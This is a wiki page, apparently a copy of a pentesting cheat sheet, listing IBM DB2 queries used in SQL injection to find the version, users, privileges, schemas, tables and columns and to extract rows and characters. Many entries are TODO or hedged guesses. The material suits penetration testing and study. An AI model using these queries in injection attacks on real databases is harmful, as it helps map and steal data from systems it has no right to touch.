hacking:sql_injection_cheat_sheet_db2
Hacking - SQL Injection Cheat Sheet (DB2)
| Version | select versionnumber, version_timestamp from sysibm.sysversions; |
| Comments | select blah from foo; – comment like this |
| Current User | select user from sysibm.sysdummy1; select session_user from sysibm.sysdummy1; select system_user from sysibm.sysdummy1; |
| List Users | N/A (I think DB2 uses OS-level user accounts for authentication.) Database authorities (like roles, I think) can be listed like this: select grantee from syscat.dbauth; |
| List Password Hashes | N/A (I think DB2 uses OS-level user accounts for authentication.) |
| List Privileges | select * from syscat.tabauth; -- privs on tables select * from syscat.dbauth where grantee = current user; select * from syscat.tabauth where grantee = current user; |
| List DBA Accounts | TODO |
| Current Database | select current server from sysibm.sysdummy1; |
| List Databases | SELECT schemaname FROM syscat.schemata; |
| List Columns | select name, tbname, coltype from sysibm.syscolumns; |
| List Tables | select name from sysibm.systables; |
| Find Tables From Column Name | TODO |
| Select Nth Row | select name from (SELECT name FROM sysibm.systables order by name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only; |
| Select Nth Char | SELECT SUBSTR('abc',2,1) FROM sysibm.sysdummy1; – returns b |
| Bitwise AND | This page seems to indicate that DB2 has no support for bitwise operators! |
| ASCII Value → Char | select chr(65) from sysibm.sysdummy1; – returns 'A' |
| Char → ASCII Value | select ascii('A') from sysibm.sysdummy1; – returns 65 |
| Casting | SELECT cast('123' as integer) FROM sysibm.sysdummy1;|
SELECT cast(1 as char) FROM sysibm.sysdummy1;
|
| String Concatenation | SELECT 'a' concat 'b' concat 'c' FROM sysibm.sysdummy1; -- returns 'abc' select 'a' || 'b' from sysibm.sysdummy1; -- returns 'ab' |
| If Statement | TODO |
| Case Statement | TODO |
| Avoiding Quotes | TODO |
| Time Delay | ???. See Heavy Queries article for some ideas. |
| Make DNS Requests | TODO |
| Command Execution | TODO |
| Local File Access | TODO |
| Hostname, IP Address | TODO |
| Location of DB files | TODO |
| Default/System Databases | TODO |
References
hacking/sql_injection_cheat_sheet_db2.txt · Last modified: 2020/07/15 10:30 by 127.0.0.1